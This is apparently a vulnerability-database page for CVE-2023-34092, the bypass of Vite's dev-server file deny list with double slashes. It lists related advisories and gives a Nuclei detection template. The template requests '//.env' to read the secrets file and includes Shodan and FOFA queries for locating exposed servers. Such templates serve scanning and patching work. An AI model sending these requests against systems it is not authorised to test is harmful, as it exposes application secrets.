| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
| CVE-2023-34092 | 30 Mar 202621:03 | – | circl | |
| Vite 安全漏洞 | 1 Jun 202300:00 | – | cnnvd | |
| CVE-2023-34092 | 1 Jun 202316:29 | – | cve | |
| CVE-2023-34092 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//) | 1 Jun 202316:29 | – | cvelist | |
| EUVD-2023-1665 | 3 Oct 202520:07 | – | euvd | |
| EUVD-2024-0322 | 3 Oct 202520:07 | – | euvd | |
| Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//) | 6 Jun 202302:01 | – | github | |
| CVE-2023-34092 | 1 Jun 202317:15 | – | nvd | |
| CVE-2023-34092 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//) | 1 Jun 202316:29 | – | osv | |
| GHSA-353F-5XF4-QW67 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//) | 6 Jun 202302:01 | – | osv |
id: CVE-2023-34092
info:
name: Vite Dev Server - Information Exposure
author: ritikchaddha
severity: high
description: |
Vite dev server could allow reading files from the Vite project root by bypassing server.fs.deny with double forward-slash paths (//). This affects exposed dev servers only.
impact: |
Unauthenticated users can read sensitive files in the project root, potentially leading to information disclosure.
remediation: |
Update to Vite version 4.3.9, 4.2.3, 4.1.5, 4.0.5, 3.2.7, or 2.9.16 or later.
reference:
- https://github.com/vitejs/vite/security/advisories/GHSA-353f-5xf4-qw67
- https://nvd.nist.gov/vuln/detail/CVE-2023-34092
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-34092
epss-score: 0.03152
epss-percentile: 0.86383
cwe-id: CWE-50
metadata:
max-request: 2
verified: true
fofa-query: body="/@vite/client"
shodan-query: http.html:"/@vite/client"
tags: cve,cve2023,env,vite,exposure,bypass
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/.env"
matchers:
- type: status
status:
- 403
internal: true
- method: GET
path:
- "{{BaseURL}}//.env"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "VITE_APP_SECRET"
case-insensitive: true
- type: status
status:
- 200
# digest: 490a00463044022065bd4a16e45a3f00e08303930270a7ace59a3420ca717e6f08ad0c17f12fc00602206b6996106cadb0b7712a38d893dd82455265c3cabd5b96b2e662bf19dc86fedc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation